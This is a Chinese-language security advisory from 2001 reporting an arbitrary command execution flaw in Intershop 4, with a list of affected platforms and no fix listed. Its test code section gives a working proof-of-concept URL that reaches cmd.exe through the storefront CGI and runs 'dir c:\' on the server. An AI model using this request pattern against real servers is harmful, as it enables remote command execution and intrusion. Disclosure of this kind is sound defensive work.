Intershop4 存在任意命令可执行漏洞

发布时间：2001-09-25
更新时间：2001-09-25
严重程度：高
威胁程度：普通用户访问权限
错误类型：输入验证错误
利用方式：服务器模式

受影响系统

Intershop Communications Intershop 4
   - Compaq Tru64 5.1
   - Microsoft Windows 2000
   - Microsoft Windows 2000 SP1
   - Microsoft Windows 2000 SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0SP1
   - Microsoft Windows NT 4.0SP2
   - Microsoft Windows NT 4.0SP3
   - Microsoft Windows NT 4.0SP4
   - Microsoft Windows NT 4.0SP5
   - Microsoft Windows NT 4.0SP6
   - Microsoft Windows NT 4.0SP6a
   - Microsoft Windows NT 4.0SP7
   - RedHat Linux 7.2
   - S.u.S.E. Linux 7.2
   - Sun Solaris 8.0

详细描述
Intershop4对URL编码处理存在漏洞，可以导致任意命令可执行。

测试代码
https://www.xxxxxxxx.com/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e9501
0642/winnt/cmd.exe?/c+dir+c:\

或者

https://www.xxxxxxxxxx.com/cgi-bin/buy.storefront/3baecb4a00025ad227a4c30e95
010642/hi/hi

解决方案
尚无

相关信息
MegaHz (admin@cyhackportal.com)

最近严重漏洞

Intershop4 存在任意命令可执行漏洞